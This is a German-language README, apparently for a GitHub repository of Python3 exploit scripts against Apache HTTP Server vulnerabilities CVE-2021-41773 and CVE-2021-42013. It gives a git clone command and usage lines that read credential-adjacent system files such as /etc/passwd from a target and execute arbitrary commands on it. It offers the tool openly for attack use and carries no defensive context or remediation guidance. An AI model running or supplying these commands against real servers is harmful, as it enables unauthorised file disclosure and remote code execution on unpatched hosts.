
Exploit erstellt in python3 zur Ausnutzung bekannter Schwachstellen im Apache Webserver (CVE-2021-41773, CVE-2021-42013)
Exploit in Python3 erstellt, um bekannte Schwachstellen im Apache-Webserver auszunutzen (CVE-2021-41773, CVE-2021-42013)
Das Apache HTTP Server Project ist ein Bestreben, einen quelloffenen HTTP-Server für moderne Betriebssysteme einschließlich UNIX und Windows zu entwickeln und zu warten. Ziel dieses Projekts ist es, einen sicheren, effizienten und erweiterbaren Server bereitzustellen, der HTTP-Dienste im Einklang mit den aktuellen HTTP-Standards anbietet.
Führen Sie einfach ein git clone aus:
git clone https://github.com/0xGabe/Apache-CVEs
Um die gewünschte Datei zu lesen, übergeben Sie einfach den Dateipfad. Falls der Benutzer keine Leseberechtigung hat, wird kein Leseergebnis angezeigt.
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
Um Befehle mit Leerzeichen, Sonderzeichen oder Ähnlichem auf dem Zielrechner auszuführen, muss der Befehl in Anführungszeichen übergeben werden.
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
Um die gewünschte Datei zu lesen, übergeben Sie einfach den Dateipfad. Falls der Benutzer keine Leseberechtigung hat, wird kein Leseergebnis angezeigt.
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
Um Befehle mit Leerzeichen, Sonderzeichen oder Ähnlichem auf dem Zielrechner auszuführen, muss der Befehl in Anführungszeichen übergeben werden.
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id